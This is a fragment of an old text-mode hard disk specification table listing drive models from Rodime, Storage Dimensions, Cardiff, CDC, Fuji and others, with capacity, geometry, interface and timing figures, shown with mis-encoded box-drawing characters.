ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME RO-652A 3.50 HALF 20.0MB SCSI 85mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME RO-652B 3.50 HALF 25.5MB 20.7MB 306 33 2 4 SM SCSI RLL(2,7) 600 Y 85mS 7.5Mb 20K 13.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME COBRA 650e 5.25 650.0MB 15 VC SCSI Y 17mS 15.0Mb 50K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME RO-101 5.25 FULL 6.0MB 192 96 17 1 2 ST412 MFM 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME RO-102 5.25 FULL 12.0MB 192 96 17 2 4 ST412 MFM 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME RO-103 5.25 FULL 18.0MB 192 96 17 3 6 ST412 MFM 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME RO-104 5.25 FULL 24.0MB 192 96 17 4 8 ST412 MFM 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME RO-201 5.25 FULL 5.0MB 321 132 17 1 2 ST412 MFM 85mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME RO-201E 5.25 FULL 11.0MB 640 264 17 1 2 ST412 MFM 55mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME RO-202 5.25 HALF 10.0MB 321 132 17 2 4 ST412 MFM 85mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME RO-202E 5.25 FULL 21.0MB 640 264 17 2 4 ST412 MFM 55mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME RO-203 5.25 HALF 15.0MB 321 132 17 3 6 ST412 MFM 85mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME RO-203E 5.25 FULL 32.0MB 640 264 17 3 6 ST412 MFM 55mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + + þ + + + + + + + + + PAGE 35 + --SIZE-- -----CAPACITY---- PRE- S/ # RW HD INTER- RECORD TKS AVE XFER POWER + MANUFACTURER MODEL NUMBER WTH. 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DIMEM. MAC195 3.50 HALF 195.0MB 7 SCSI RLL(2,7) Y 15mS 150K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + STOR. DIMEN PS320S 5.25 FULL 384.0MB 320.0MB 1224 36 8 15 VC SCSI RLL(2,7) 1070 Y 16mS 10.0Mb MAXTOR XT-4380S + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + STOR. DIMEN. AT100S 3.50 HALF 105.0MB 3 SCSI RLL(2,7) Y 19mS 150K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + STOR. DIMEN. AT200S 3.50 HALF 204.0MB 7 SCSI RLL(2,7) Y 15mS 150K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + STOR. DIMEN. AT1000S 5.25 1000.0MB 15 VC SCSI Y 15mS 22.0Mb 100K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + STOR. DIMEN. AT120 5.25 FULL 140.0MB 119.9MB 918 17 8 15 VC ST412 MFM Y 27mS 5.0Mb MAXTOR XT-1140 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + STOR. DIMEN. AT155E 5.25 FULL 180.0MB 156.0MB 1224 36 5 9 VC ESDI RLL(2,7) 1070 Y 14mS 10.0Mb MAXTOR XT-4170E + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + STOR. DIMEN. AT155S 5.25 FULL 180.0MB 156.0MB 1224 36 5 9 VC SCSI RLL(2,7) 1070 Y 14mS 10.0Mb MAXTOR XT-4170S + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + + þ + + + + + + + + + PAGE 42 + --SIZE-- -----CAPACITY---- PRE- S/ # RW HD INTER- RECORD TKS AVE XFER POWER + MANUFACTURER MODEL NUMBER WTH. HGT. UNFORMAT FORMATED CYLS COMP TK PL HD AC FACE METHOD IN. P? ACC RATE MTBF USED COMMENTS + ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + STOR. DIMEN. AT160 5.25 FULL 190.0MB 159.8MB 1224 17 8 15 VC ST412 MFM Y 28mS 5.0Mb MAXTOR XT-2190 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + STOR. DIMEN. AT320S 5.25 FULL 384.0MB 320.0MB 1224 36 8 15 VC SCSI RLL(2,7) 1070 Y 16mS 10.0Mb 100K MAXTOR XT-4380S + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + STOR. DIMEN. AT335E 5.25 FULL 384.0MB 338.0MB 1224 36 8 15 VC ESDI RLL(2,7) 1070 Y 16mS 10.0Mb MAXTOR XT-4380E + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + STOR. DIMEN. AT650E 5.25 FULL 768.0MB 651.0MB 1632 54 8 15 VC ESDI RLL(2,7) 1376 Y 16mS 15.0Mb 70K 27.0W MAXTOR XT-8760E + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + STOR. DIMEN. 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CYLS PL ST INTERFACE XFER P? MTBF POWER + MODEL NUMBER FORMATED HGT. PREC HD AC REC.METH ACC COMMENTS + ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + CARDIFF 53.0MB 3.50 1024 3 17 ST412 5.0Mb + F-3053 44.0MB HALF 5 MFM 20mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CARDIFF 80.0MB 3.50 1024 3 26 ESDI 7.0Mb + F-3080E 68.0MB HALF 5 RLL(2,7) 20mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CARDIFF 80.0MB 3.50 1024 3 26 SCSI 7.5Mb + F-3080S 68.0MB HALF 5 RLL(2,7) 20mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CARDIFF 127.0MB 3.50 1024 3 35 ESDI 10.0Mb + F-3127E 109.0MB HALF 5 RLL(2,7) 20mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CARDIFF 127.0MB 3.50 1024 3 35 SCSI 10.0Mb + F-3127S 109.0MB HALF 5 RLL(2,7) 20mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC BJ7D5A 5.25 670 3 17 ST412 5.0Mb + 77731608 29.0MB FULL 128 5 MFM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC BJ7D5A 5.25 733 3 17 ST412 5.0Mb + 77731613 FULL 128 5 MFM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC BJ7D5A 5.25 670 2 17 ST412 + 77731614 23.0MB FULL 4 MFM 36mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC ELITE 1200.0MB 5.25 10 SMD 24.0Mb 100K 50.0W + 97500-12G FULL 17 VC 12mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC ELITE 1500.0MB 5.25 10 SCSI-2 30.0Mb 100K 45.0W + 97501-15G FULL 17 VC RLL(ZBR) 12mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC ELITE 1200.0MB 5.25 10 IPI-2 24.0Mb 100K 50.0W + 97509-12G FULL 17 VC 12mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 136.0MB 3.50 3 SCSI 10.0Mb Y 70K 9.0W + 94311-136 120.0MB SUBH 5 VC RLL(2,7) 15mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 136.0MB 3.50 3 SCSI 10.0Mb Y 70K 9.0W + 94311-136 120.0MB HALF 5 VC RLL(2,7) 15mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 136.0MB 3.50 3 SCSI-2 10.0Mb Y 70K 9.0W + 94311-136S 120.0MB SUBH 5 VC RLL(2,7) 15mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 136.0MB 3.50 3 IDE(AT) 10.0Mb Y 70K 9.0W + 94314-136 120.0MB SUBH 5 VC RLL(2,7) 15mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 111.0MB 3.50 1072 3 ESDI 10.0Mb 70K 11.0W + 94316-111 98.0MB HALF 5 23mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 136.0MB 3.50 3 ESDI 10.0Mb Y 70K 11.0W + 94316-136 120.0MB HALF 5 VC RLL(2,7) 15mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + þ + + + PAGE 4 + MANUFACTURER UNFORMAT WTH. CYLS PL ST INTERFACE XFER P? MTBF POWER + MODEL NUMBER FORMATED HGT. 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CYLS PL ST INTERFACE XFER P? MTBF POWER + MODEL NUMBER FORMATED HGT. PREC HD AC REC.METH ACC COMMENTS + ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + ESPERT 3.50 2 IDE + EP-340A 42.8MB HALF 4 RLL(2,7) 25mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJI 13.0MB 3.50 306 2 17 ST412 5.0Mb + FK301-13 10.0MB HALF 128 4 MFM 65mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJI 13.0MB 3.50 612 1 17 ST412 5.0Mb + FK302-13 10.0MB HALF 307 2 MFM 65mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJI 26.0MB 3.50 612 2 17 ST412 5.0Mb + FK302-26 21.0MB HALF 307 4 MFM 65mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJI 39.0MB 3.50 612 3 17 ST412 5.0Mb + FK302-39 32.0MB HALF 307 6 MFM 65mS + 